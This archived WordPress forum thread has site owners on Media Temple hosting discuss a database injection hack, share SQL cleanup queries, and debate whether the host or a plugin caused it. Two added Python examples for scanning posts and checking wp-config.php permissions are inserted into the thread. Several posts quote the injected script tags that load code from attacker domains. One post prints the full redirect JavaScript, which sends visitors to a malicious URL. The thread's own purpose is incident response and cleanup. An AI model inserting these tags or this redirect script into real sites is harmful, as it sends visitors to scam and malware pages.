WordPress.org

Forums

Media Temple oeaou hack (72 posts)

  1. greenhoe
    Member
    Posted 5 years ago #

    Hi,
    I looked in one of my pages today and now all of a sudden all my pages and posts have <script src="http://ue.oeaou.com/31"></script> when you view the page in the HTML.

    Was my site hacked or was this put in here by a plugin?

  2. rutlo
    Member
    Posted 5 years ago #

    I got the same thing. What plugins do you use? Maybe we have some of the same ones.

  3. Ankantoiel
    Member
    Posted 5 years ago #

    I have the same problem on several sites. I have checked the plugins I use, but they are different on the installations.

  4. mediosia
    Member
    Posted 5 years ago #

    Well, I had the same problem. MediaTemple is my hosting provider, and they helped me out with this. This is a WordPress Redirect Exploit hack that puts a line of code in your database tables wp_posts and wp_cats_posts.

    The line that is put by the hack in your wp_posts and wp_cats_posts can be one of these or similar:

    <script src="http://ae.awaue.com/7"></script>
    <script src="http://ue.oeaou.com/31"></script>
    <script src="http://ie.eracou.com/3"></script>
    <script src="http://ao.euuaw.com/9"></script>

    You must delete all of these lines

    Symptoms
    * Visitors viewing posts on your blog may be redirected to third-party sites.
    * Visitors may also be redirected to qooglesearch.com, which has already been disabled.

    Clean-Up

    Search in your database (especially in the "wp_posts" and "wp_cats_posts" tables) for strings like these and delete them.

    Info taken from: http://wiki.mediatemple.net/w/WordPress_Redirect_Exploit

    I don't know if maybe some plugin is doing this. I have the following plugins, let me know if you have the same or which ones you have:

    Adminimize
    Akismet
    cforms
    Cleanup WordPress
    Google Analyticator
    Google News Sitemap
    Google XML Sitemaps
    HeadSpace2
    Insights
    jQuery Lightbox For Native Galleries
    MobilePress
    Podcasting Plugin by TSG
    Post Tabs
    Really Simple CAPTCHA
    Revision Control
    SEO Friendly Images
    WordPress.com Stats
    WP-PageNavi
    WP-UserOnline
    WP Geo
    ZD YouTube FLV Player

  5. Ankantoiel
    Member
    Posted 5 years ago #

    Ah thanks for the reply. My sites are also hosted on a mediatemple server. So I will try now their solution.

  6. jjwright85
    Member
    Posted 5 years ago #

    I've noticed the same problem on a few Media Temple WordPress websites this morning. The fix above from Media Temple's site ended up fixing it.

  7. thekmen
    Member
    Posted 5 years ago #

    Same problem here today on MediaTemple.
    The <script src= is also inserted into media attachment descriptions, so make sure to clean those too.

  8. locality
    Member
    Posted 5 years ago #

    Is it strange that everyone that is having a problem is using MediaTemple? I just noticed the same thing today.

    Here are the plugins I am using:
    Akismet
    All in One Favicon
    Announcement and Vertical Scroll News
    BM Custom Login
    Constant Contact API
    Kimili Flash Embed
    Store Locator

    It looks like only Akismet is in common with you, Mediosia. I am trying to fix it on my database, but phpMyAdmin will not let me login. MediaTemple is working on it, but at this point, I'm thinking about switching hosting. I have lots of other WordPress sites and never had this problem with different hosts.

  9. qbradley
    Member
    Posted 5 years ago #

    Count me in. Found it on mine too.
    And I'm on media temple.

    <script src="http://ue.oeaou.com/31"></script>

    This redirects people to a "Virus Scan" and asks them to download the "fix"

  10. qbradley
    Member
    Posted 5 years ago #

    WOW!
    Now I just have a big fat "Error establishing a database connection" on my home page.

  11. qbradley
    Member
    Posted 5 years ago #

    I went through the cleanup process as mentioned by mediosia
    I'm good to go for now

  12. mrmist
    Forum Janitor
    Posted 5 years ago #

    Seems to be a media temple issue, will sticky this for now.

    http://codex.wordpress.org/FAQ_My_site_was_hacked has some info on what to do in the event of hacks, as well as referencing the above posts.

  13. thekmen
    Member
    Posted 5 years ago #

    fixed here too by removing all mentions via sql, but what a nightmare, esp. if you have a few databases & multiple installs.

  14. iso50
    Member
    Posted 5 years ago #

    On Mediatemple too. Called and they cleaned the DBs. As for plugs, the only ones I have in common with Mediosia are as follows:

    Akismet
    WP-Stats
    WP-Pagenavi

  15. thekmen
    Member
    Posted 5 years ago #

    @iso50 damn, they didn't clean my DBs, just sent me links on how to do it myself & more or less said it's not their problem.

  16. sandnsurf
    Member
    Posted 5 years ago #

    Same again
    Also on WordPress hosted by MediaTemple
    The only ones I have in common is

    Akismet
    WP-Stats

    Hopefully be able to clean up the database as per mediatemple suggestion...not the first time the MediaTemple blog has fallen over, whilst all the other hosting servers remain solid!

  17. EthanCaine
    Member
    Posted 5 years ago #

    Akismet is the only common plugin between all of us and since it comes DEFAULT with wordpress I'm not sure we should be blaming it.

    Even my obscure blogs that have no traffic going to them with only a default wordpress install got hacked.

    The IP addresses are pointing to LATVIA...those damn Latvians.

    Anyone have any idea how those Latvians gained access to our MediaTemple accounts?

  18. virtualimpax
    Member
    Posted 5 years ago #

    I'm with Ethan - it looks like the common denominator here is the host - not a plugin.

    I have a WP blog hosted with MT - ran the SQL query and I'm clean - for now! (Thanks for the link MrMist!)

    I had to double check to make certain this thread wasn't dated BEFORE the big "database clean up" project from last April - when they went in and changed the USER ID and Passwords to improve security.

    The $64,000 question is - is my blog "clean" because they updated my DB info or is it just because the hackers haven't found my blog yet?

  19. entilza72
    Member
    Posted 5 years ago #

    I agree, I think it is the host. I too run WP on mt and I had the same hack.

    I cleaned the site as per the instructions.

    A few hours later I checked my site again, and it had the same redirect. I checked the db again and lo - it was hacked again (either that, or the first round cleaning was not successful despite me checking). Cleaned again.

    This begs the question. How is this happening? No information is available.

    We are not seeing it on other hosts, so I am guessing this is an exploit due to Media Temple's setup. I am guessing the exposure is occurring on the database, not via the WP application.

    Cheers,
    Entilza

  20. rgbk
    Member
    Posted 5 years ago #

    this is NUTS
    how can either WP or MT be having this?
    Can someone help me understand why it would be MT and not WP, or vice versa?

    I pay a lot to MT and it seems they have had these hacking issues more than once.
    I'm on MT too, their grid service.

  21. rgbk
    Member
    Posted 5 years ago #

    Any of you using vimeo on your site?
    I'm using vimeo as flash and as jquery built video (needed to control volume on some of the autoplaying videos)

    I don't use Akismet, deleted it, and don't share the same plugins listed in this forum.

  22. rgbk
    Member
    Posted 5 years ago #

    that url http://ue.oeaou.com/31 takes me to this script:

    function toloveyes(alwayslovers,value,tobelove){
    	var exdate=new Date();
    	exdate.setDate(exdate.getDate()+tobelove);
    	document.cookie=alwayslovers+ "=" +escape(value)+
    	((tobelove==null) ? "" : ";expires="+exdate.toGMTString());
    }
    
    function getCookie(alwayslovers){
    if (document.cookie.length>0)
      {
      cstatr=document.cookie.indexOf(alwayslovers + "=");
      if (cstatr!=-1)
        {
        cstatr=cstatr + alwayslovers.length+1;
        olalala=document.cookie.indexOf(";",cstatr);
        if (olalala==-1) olalala=document.cookie.length;
        return unescape(document.cookie.substring(cstatr,olalala));
        }
      }
    return "";
    }
    
    var name=getCookie("pma_visited_theme2");
    if (name==""){
    	toloveyes("pma_visited_theme2","1",20);
    	var url="http://e.auoo.info/in2.php?n=508102";
    	window.top.location.replace(url);
    }else{
    
    }

  23. rgbk
    Member
    Posted 5 years ago #

    If you google that pma_visited_theme2 you get this:

    http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=pma_visited_theme2

  24. entilza72
    Member
    Posted 5 years ago #

    rgbk, it's simple:

    If it was a plug-in, or wordpress, or any other common object, then we would be seeing this on other hosts too.

    No one is reporting this issue on any other host.

    Only Media Temple GS (Grid Service) customers are complaining. I think that pretty clearly points the finger at a vulnerability directly related to that host. Try googling for more info (as I did) and you will find very little info, except pointing to media temple's site, blogs/tweets from media temple users, and this thread.

    I suspect customer databases are being manipulated without using wordpress (ie: the exploit is not occurring via wordpress), although I do note with great suspicion that all my wp php files were altered on 31 July. Possibly that was the WP 3.0.1 update though.

    Cheers,
    Entilza

  25. traversal
    Member
    Posted 5 years ago #

    I have this issue on every single site I look after on MediaTemple GS too. Bummer. Did anyone else notice that their WordPress sites slowed to a CRAWL for a few hours mid-way through last week? My guess is that this is when the attack took place.

  26. khawkins98
    Member
    Posted 5 years ago #

    Happened to a few folks that run sites on my GS w/ version 2.9 and 3.0.

    And the 3.0 uses only the Akismet, Pagebar2, Viper's Video Quicktags, and WP-Walla plugins.

    This SQL query helped clean nicely
    UPDATE wp_posts SET post_content = replace( post_content, '<script src="http://ao.euuaw.com/9"></script>', ' ')

    @entilza72 The hack didn't affect the timestamps of wp-*.php files.
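
Added example, not part of any post in this thread: the cleanup queries above remove one exact string at a time, so this sketch generalizes them by flagging any external `<script src=...></script>` element in the text columns of exported wp_posts rows and returning a cleaned copy for review. The function names, the allowlist parameter and the sample rows are assumptions of the example; the two injected tags in the sample are copied from the thread.

```python
import re
from urllib.parse import urlparse

# An empty external <script src="..."></script> element: the shape of every
# injected line quoted in this thread.
SCRIPT_RE = re.compile(
    r'<script\b[^>]*\bsrc\s*=\s*["\']?(?P<src>https?://[^"\'\s>]+)["\']?[^>]*>\s*</script>',
    re.IGNORECASE,
)

# Text columns of wp_posts to inspect. Attachments are wp_posts rows too
# (post_type = 'attachment'), so their descriptions are covered.
TEXT_COLUMNS = ("post_title", "post_content", "post_excerpt")


def strip_foreign_scripts(text, allowed_hosts=frozenset()):
    """Return (cleaned_text, removed_srcs); tags from allowed_hosts are kept."""
    removed = []

    def _replace(match):
        host = (urlparse(match.group("src")).hostname or "").lower()
        if host in allowed_hosts:
            return match.group(0)
        removed.append(match.group("src"))
        return ""

    return SCRIPT_RE.sub(_replace, text), removed


def audit_rows(rows, allowed_hosts=frozenset()):
    """Return (findings, cleaned_rows); findings are (ID, column, src) tuples."""
    findings, cleaned_rows = [], []
    for row in rows:
        cleaned = dict(row)
        for col in TEXT_COLUMNS:
            cleaned[col], removed = strip_foreign_scripts(row.get(col) or "", allowed_hosts)
            findings.extend((row["ID"], col, src) for src in removed)
        cleaned_rows.append(cleaned)
    return findings, cleaned_rows


# Constructed sample rows; the two injected tags are copied from the thread,
# player.example.com is a made-up legitimate embed.
SAMPLE_ROWS = [
    {"ID": 1, "post_content": 'Hello<script src="http://ue.oeaou.com/31"></script>'},
    {"ID": 2, "post_excerpt": 'Photo <script src="http://ao.euuaw.com/9"></script>'},
    {"ID": 3, "post_content": '<script src="http://player.example.com/e.js"></script>'},
]
```

Reviewing the findings list before writing anything back shows which rows and columns were touched, including attachment rows that a query against post_content of posts alone would miss.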

  27. rgbk
    Member
    Posted 5 years ago #

    Are you guys getting a response from MT?
    I find it shocking that i sent them a support query yesterday and 24 hours still nothing?
    They aren't cheap either. I mean why aren't they jumping on this issue? I sent them this forum discussion and everything.

    Btw i didn't update to 3.01.

  28. UseShots
    Member
    Posted 5 years ago #

    Hi,

    There have been many similar problems on MediaTemple lately. Can you check permissions of wp-config.php and report them here?

    This file contains MySQL passwords in clear text and should not be world-readable. Otherwise, anyone from neighbor accounts can gain access to your WordPress database and modify it however they want to.

  29. brent3721
    Member
    Posted 5 years ago #

    also using mediatemple grid server, we are in spain at the moment, maybe people can report their geographic location, I doubt that matters, but you never know.

  30. entilza72
    Member
    Posted 5 years ago #

    @UseShots - mine was world read. Not good practice, but I believe these servers are jailed and it is not possible for a user to cd into your file structure, or read a file if they know where it is. I have changed to my local user rw (rw---- or 500) just in case.

    @rgbk - it occurred with my 3.0.1 site. I logged a job over 24 hrs ago. The official line over a day ago was this was a WordPress exploit, not an mt problem. Clearly, that is incorrect.

    @khawkins98 - yeah, I figure I updated to 3.0.1 on that date.

    @traversal - my mt wp site has been crawling since day one. Often can take up to 10 seconds to begin serving. Strangely, non-wp content can begin serving in around 2 seconds.
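
Added example, not part of any post in this thread: a check for the wp-config.php permission question raised above, walking a directory that holds several installs and reporting every wp-config.php that group or other accounts can access. Owner read/write only is octal mode 600; the function names, the directory layout in the demo and the assumption that PHP runs as the file's owner are assumptions of the example.

```python
import os
import stat
import tempfile


def audit_wp_configs(root, fix=False):
    """Report every wp-config.php under root that group or others can access.

    Returns a list of (path, old_mode, new_mode), modes as octal strings.
    With fix=True the file is set to 0o600 (owner read/write only), which
    assumes PHP runs as the file's owner.
    """
    results = []
    for dirpath, _dirs, files in os.walk(root):
        if "wp-config.php" not in files:
            continue
        path = os.path.join(dirpath, "wp-config.php")
        if os.path.islink(path):
            continue  # a symlink's own mode says nothing; audit its target instead
        mode = stat.S_IMODE(os.stat(path).st_mode)
        if not mode & (stat.S_IRWXG | stat.S_IRWXO):
            continue  # already private to the owner
        new_mode = mode
        if fix:
            os.chmod(path, 0o600)
            new_mode = stat.S_IMODE(os.stat(path).st_mode)
        results.append((path, format(mode, "03o"), format(new_mode, "03o")))
    return results


def demo():
    """Build a constructed two-install tree in a temp dir, fix it, re-audit."""
    with tempfile.TemporaryDirectory() as root:
        for site, mode in (("blog-a", 0o644), ("blog-b", 0o600)):
            os.makedirs(os.path.join(root, site))
            path = os.path.join(root, site, "wp-config.php")
            with open(path, "w") as fh:
                fh.write("<?php // constructed placeholder\n")
            os.chmod(path, mode)
        fixed = audit_wp_configs(root, fix=True)
        remaining = audit_wp_configs(root)
        summary = [(os.path.basename(os.path.dirname(p)), old, new)
                   for p, old, new in fixed]
        return summary, remaining
```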

Topic Closed

This topic has been closed to new replies.
